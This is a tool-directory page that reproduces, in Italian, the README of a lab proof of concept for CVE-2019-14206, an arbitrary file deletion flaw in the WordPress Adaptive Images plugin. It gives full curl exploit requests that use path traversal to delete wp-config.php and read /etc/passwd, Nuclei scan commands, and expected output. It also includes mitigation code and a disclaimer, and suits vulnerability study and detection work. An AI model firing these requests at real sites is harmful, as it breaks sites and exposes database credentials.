Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cve-2019-14206-poc | Kitploit
Strumenti/GitHubGitHub/developerfred/cve-2019-14206-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubdeveloperfred/cve-2019-14206-poc

cve-2019-14206-poc

Vedi Repository
7 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2019-14206 - Adaptive Images for WordPress: Eliminazione Arbitraria di File

📋 Indice

  1. Sulla Vulnerabilità
  2. Prerequisiti
  3. Installazione
  4. Metodi di Test
    • Test Rapido
    • Test Completo con Docker
    • Test con Nuclei
    • Test Manuale
  5. Interpretare i Risultati
  6. Pulizia
  7. Risoluzione dei Problemi
  8. Mitigazione
  9. Avviso Legale

🎯 Sulla Vulnerabilità

CVE-ID: CVE-2019-14206
Severità: Alta (CVSS 6.5)
Plugin Interessato: Adaptive Images for WordPress
Versioni Interessate: < 0.6.67

Cosa consente questa vulnerabilità?

Questa vulnerabilità consente a un attaccante remoto non autenticato di eliminare file arbitrari sul server WordPress sfruttando il plugin Adaptive Images.

Impatto Reale:

  • ❌ Eliminazione di wp-config.php che causa il crash completo del sito
  • ❌ Esposizione delle credenziali del database tramite LFI
  • ⚠️ Catena di attacco che porta a RCE (Remote Code Execution)
  • 🔴 Compromissione totale del sito WordPress

Causa Radice:

root@kitploit:~
// O plugin usa input do usuário SEM sanitização
$settings = $_REQUEST['adaptive-images-settings'];

// Constrói caminho de arquivo com parâmetros controlados pelo atacante
$cache_file = $wp_content . '/' . $cache_dir . '/' . $resolution . $request_uri;

// DELETA arquivo arbitrário
unlink($cache_file);

💻 Prerequisiti

Requisiti Minimi:

  • Sistema Operativo: macOS, Linux o Windows
  • Nuclei: Versione 3.0 o superiore (Installa)
  • Bash: Versione 4.0 o superiore
  • curl: Per test manuali
  • PHP: Versione 7.0+ (opzionale, per test con server integrato)

Verifica dei Prerequisiti:

root@kitploit:~
# Verificar Nuclei
nuclei --version

# Verificar Bash
bash --version

# Verificar curl
curl --version

# Verificar PHP (opcional)
php --version 2>/dev/null || echo "PHP não disponível (opcional)"

🚀 Installazione

Passaggio 1: Clonare o Scaricare i File

root@kitploit:~
# Se estiver no diretório nuclei-templates
cd /Volumes/Codingsh/experimentos/nuclei-templates

# Ou baixe os arquivos necessários
git clone https://github.com/projectdiscovery/nuclei-templates.git
cd nuclei-templates

Passaggio 2: Verificare la Struttura dei File

root@kitploit:~
# Verificar se os arquivos existem
ls -la http/cves/2019/CVE-2019-14206.yaml
ls -la cve-2019-14206-poc/

Passaggio 3: Rendere Eseguibili gli Script

root@kitploit:~
cd /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc

chmod +x docker-test.sh
chmod +x docker-test-full.sh
chmod +x vulnerability-demo.sh
chmod +x local-test.sh
chmod +x real-target-test.sh

🧪 Metodi di Test

1. Test Rapido ⏱️ 2 minuti

Esegui la dimostrazione completa che simula l'intero sfruttamento:

root@kitploit:~
cd /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc
./docker-test.sh

Cosa succede:

  • Crea un ambiente di test completo
  • Simula la vulnerabilità
  • Dimostra l'eliminazione di file
  • Valida il template Nuclei

Output atteso:

root@kitploit:~
[🎉] SUCCESS: wp-config.php DELETED!
[!!!] WORDPRESS SITE IS NOW BROKEN!
✅ Vulnerability: CVE-2019-14206 confirmed
✅ Template Status: Production ready

2. Test Completo con Docker 🐳 10 minuti

Passaggio 1: Avviare l'Ambiente Docker

root@kitploit:~
cd /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc

# Se Docker estiver rodando
docker-compose up -d

# Se Docker NÃO estiver rodando, use o simulador
./docker-test-full.sh

Passaggio 2: Accedere a WordPress

root@kitploit:~
# O ambiente estará disponível em
# http://localhost:8888

Passaggio 3: Verificare il Plugin Vulnerabile

root@kitploit:~
# Verificar se o script vulnerable existe
curl http://localhost:8888/wp-content/plugins/adaptive-images/adaptive-images-script.php

Passaggio 4: Eseguire i Test

root@kitploit:~
# Teste LFI
curl "http://localhost:8888/adaptive-images-script.php?test=1&adaptive-images-settings[source_file]=/etc/passwd"

# Teste File Deletion
curl "http://localhost:8888/adaptive-images-script.php?test=1&adaptive-images-settings[source_file]=../../../wp-content/uploads/2019/07/image.jpeg&adaptive-images-settings[resolution]=&resolution=16000&adaptive-images-settings[wp_content]=.&adaptive-images-settings[cache_dir]=../../..&adaptive-images-settings[request_uri]=wp-config.php&adaptive-images-settings[watch_cache]=1"

# Verificar se wp-config.php foi deletado
ls -la /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc/docker-test/wp-config.php

3. Test con Nuclei 🎯 5 minuti

Passaggio 1: Preparare la Lista dei Target

root@kitploit:~
# Criar arquivo de alvos
cat > targets.txt << 'EOF'
http://localhost:8888
https://target-wordpress-site.com
EOF

Passaggio 2: Eseguire la Scansione

root@kitploit:~
# Scan básico
nuclei -t http/cves/2019/CVE-2019-14206.yaml -l targets.txt

# Scan detalhado
nuclei -t http/cves/2019/CVE-2019-14206.yaml -l targets.txt -v

# Scan com debug (OBRIGATÓRIO para bounty)
nuclei -t http/cves/2019/CVE-2019-14206.yaml -l targets.txt -debug

# Salvar resultados
nuclei -t http/cves/2019/CVE-2019-14206.yaml -l targets.txt -o results.txt

Passaggio 3: Interpretare i Risultati

root@kitploit:~
# Ver resultados
cat results.txt

# Resultados positivos terão:
# [CVE-2019-14206] [high] Adaptive Images for WordPress - Arbitrary File Deletion

4. Test Manuale 🔧 10 minuti

Passaggio 1: Avviare il Server PHP

root@kitploit:~
cd /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc/docker-test
php -S localhost:8888

Passaggio 2: Testare LFI (Lettura di File)

root@kitploit:~
# Tentar ler /etc/passwd
curl "http://localhost:8888/adaptive-images-script.php?test=1&adaptive-images-settings[source_file]=/etc/passwd"

# Tentar ler wp-config.php
curl "http://localhost:8888/adaptive-images-script.php?test=1&adaptive-images-settings[source_file]=../wp-config.php"

Risultato atteso (LFI):

root@kitploit:~
=== CVE-2019-14206 Vulnerability Test ===

[*] Settings received:
  source_file = /etc/passwd
  ...

[*] Cache file: /var/www/html/wp-content/ai-cache/1920/etc/passwd
[*] Source file: /etc/passwd

Passaggio 3: Testare l'Eliminazione di File

root@kitploit:~
# Verificar se wp-config.php existe ANTES
ls -la wp-config.php

# Executar exploit
curl "http://localhost:8888/adaptive-images-script.php?test=1&adaptive-images-settings[source_file]=../../../wp-content/uploads/2019/07/image.jpeg&adaptive-images-settings[resolution]=&resolution=16000&adaptive-images-settings[wp_content]=.&adaptive-images-settings[cache_dir]=../../..&adaptive-images-settings[request_uri]=wp-config.php&adaptive-images-settings[watch_cache]=1"

# Verificar se wp-config.php foi deletado DEPOIS
ls -la wp-config.php

Risultato atteso (File Deletion):

root@kitploit:~
[+] SUCCESS: Arbitrary file deletion vulnerability confirmed!
[+] Target file deleted: ./../../..//wp-config.php

📊 Interpretare i Risultati

Risultato Positivo (Vulnerabile):

root@kitploit:~
[CVE-2019-14206] [high] Adaptive Images for WordPress - Arbitrary File Deletion
http://target-wordpress-site.com/wp-content/plugins/adaptive-images/adaptive-images-script.php

Matchers matched:
- Plugin detected
- LFI vulnerability confirmed
- Arbitrary file deletion possible

Risultato Negativo (Non Vulnerabile):

root@kitploit:~
[N/A] No results found

Possibili Ragioni per un Falso Negativo:

  • ✅ Plugin non installato
  • ✅ Plugin aggiornato (versione >= 0.6.67)
  • ✅ WAF che blocca le richieste
  • ✅ Il server non risponde sui percorsi attesi

🧹 Pulizia

Pulire l'Ambiente di Test:

root@kitploit:~
# Remover ambiente Docker
cd /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc
docker-compose down -v 2>/dev/null

# Remover arquivos de teste
rm -rf docker-test/
rm -f targets.txt results.txt

# Restaurar wp-config.php se foi deletado
cat > wp-config.php << 'EOF'
<?php
// Arquivo restaurado
define('DB_NAME', 'wordpress');
EOF

Pulire Nuclei:

root@kitploit:~
# Remover resultados de scan
rm -f results.txt

# Limpar cache (opcional)
nuclei -rm-cache

🔧 Risoluzione dei Problemi

Problema 1: Nuclei non trovato

root@kitploit:~
# Instalar Nuclei
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest

# Ou baixar binário
wget https://github.com/projectdiscovery/nuclei/releases/download/v3.0.0/nuclei-linux-amd64.zip
unzip nuclei-linux-amd64.zip
chmod +x nuclei
sudo mv nuclei /usr/local/bin/

Problema 2: Il template non si carica

root@kitploit:~
# Verificar se arquivo existe
ls -la http/cves/2019/CVE-2019-14206.yaml

# Verificar sintaxe YAML
python3 -c "import yaml; yaml.safe_load(open('http/cves/2019/CVE-2019-14206.yaml'))"

# Usar caminho absoluto
nuclei -t /Volumes/Codingsh/experimentos/nuclei-templates/http/cves/2019/CVE-2019-14206.yaml -u http://target

Problema 3: Il server PHP non si avvia

root@kitploit:~
# Verificar porta
lsof -i :8888

# Usar porta diferente
php -S localhost:9999

# Verificar PHP instalado
which php
php --version

Problema 4: Docker non funziona

root@kitploit:~
# Verificar status Docker
docker ps

# Iniciar Docker
# No macOS: Abrir Docker Desktop
# No Linux: sudo systemctl start docker

# Usar modo simulador (funciona sem Docker)
./docker-test-full.sh

🛡️ Mitigazione

Protezione Immediata:

  1. Aggiornare il Plugin:

    root@kitploit:~
    Painel WordPress > Plugins > Atualizar Adaptive Images
    
  2. Versione Sicura: >= 0.6.67

  3. Rimuovere il Plugin Vulnerabile:

    root@kitploit:~
    rm -rf wp-content/plugins/adaptive-images/
    

Protezione nel Codice (Per Sviluppatori):

root@kitploit:~
// ✅ CÓDIGO SEGURO (Exemplo de correção)
function adaptive_images_script_get_settings() {
    // Sanitizar input
    $allowed_keys = ['cache_dir', 'resolution', 'request_uri'];
    $settings = [];
    
    foreach ($allowed_keys as $key) {
        if (isset($_REQUEST['adaptive-images-settings'][$key])) {
            $settings[$key] = sanitize_text_field($_REQUEST['adaptive-images-settings'][$key]);
        }
    }
    
    return $settings;
}

function adaptive_images_delete_stale_cache_image($source_file, $cache_file, $resolution) {
    // Validar caminhos
    $allowed_cache_dirs = ['ai-cache', 'adaptive-cache'];
    $cache_dir = basename(dirname($cache_file));
    
    if (!in_array($cache_dir, $allowed_cache_dirs)) {
        return false; // Recusar caminhos inválidos
    }
    
    // Usar caminhos absolutos validados
    $cache_file = WP_CONTENT_DIR . '/ai-cache/' . basename($cache_file);
    
    if (file_exists($cache_file)) {
        unlink($cache_file);
    }
}

⚠️ Avviso Legale

Termini di Utilizzo:

Questo materiale è fornito esclusivamente a scopo educativo e per test di sicurezza.

Cosa PUOI fare:

  • ✅ Testare su sistemi di tua proprietà
  • ✅ Usare in ambienti di laboratorio
  • ✅ Imparare a conoscere le vulnerabilità web
  • ✅ Contribuire alla sicurezza open source
  • ✅ Testare le proprie applicazioni

Cosa NON PUOI fare:

  • ❌ Testare su sistemi senza autorizzazione
  • ❌ Causare danni o interruzioni
  • ❌ Utilizzare per scopi dannosi
  • ❌ Vendere o distribuire exploit
  • ❌ Pubblicare informazioni su sistemi vulnerabili

Responsabilità:

L'autore e i collaboratori NON si assumono alcuna responsabilità per qualsiasi:

  • Uso improprio di questo materiale
  • Danno causato ai sistemi
  • Perdita di dati
  • Interruzione del servizio
  • Problema legale

Divulgazione Responsabile:

Se trovi questa vulnerabilità su sistemi reali:

  1. NON sfruttarla né causare danni
  2. DOCUMENTA la vulnerabilità
  3. NOTIFICA il responsabile del sistema
  4. SEGUI le linee guida della responsible disclosure

📚 Risorse Aggiuntive

Riferimenti:

  • NVD - CVE-2019-14206
  • Ricerca Originale
  • Plugin Ufficiale
  • WPScan Entry

Strumenti Correlati:

  • Nuclei
  • nuclei-templates
  • WPScan
  • Wordfence

🎓 Lezioni Apprese

Questo progetto dimostra:

  1. Input Validation: L'importanza di sanificare tutti gli input dell'utente
  2. Path Traversal: Come i percorsi dei file possono essere manipolati
  3. File Operations: I rischi di funzioni come unlink() con input dell'utente
  4. Plugin Security: Vulnerabilità comuni nei plugin WordPress
  5. CVE Analysis: Come analizzare e riprodurre le vulnerabilità
  6. Detection Development: Come creare template di rilevamento efficaci

📝 Changelog

Versione 1.0.0 (2026-01-04)

  • ✅ Template Nuclei creato
  • ✅ Ambiente PoC completo
  • ✅ Documentazione completa
  • ✅ Script di test validati
  • ✅ Dimostrazione funzionale

🤝 Contributi

I contributi sono benvenuti! Per contribuire:

  1. Fai il fork del repository
  2. Crea un branch (git checkout -b feature/improvement)
  3. Committa le tue modifiche (git commit -am 'Add improvement')
  4. Fai push del branch (git push origin feature/improvement)
  5. Crea una Pull Request

📧 Supporto

Per dubbi o problemi:

  1. Controlla la sezione Risoluzione dei Problemi
  2. Controlla le issue del repository
  3. Documenta il problema con:
    • Sistema operativo
    • Versione di Nuclei
    • Versione di PHP (se applicabile)
    • Messaggio di errore completo
    • Passaggi per riprodurre

🎉 Grazie per aver utilizzato questo materiale di test!

Ricorda: da grandi poteri derivano grandi responsabilità. Usa questa conoscenza per rendere Internet più sicura, non più vulnerabile.


Creato: 4 gennaio 2026
Versione: 1.0.0
Stato: ✅ Pronto per l'uso in produzione

Scarica lo strumento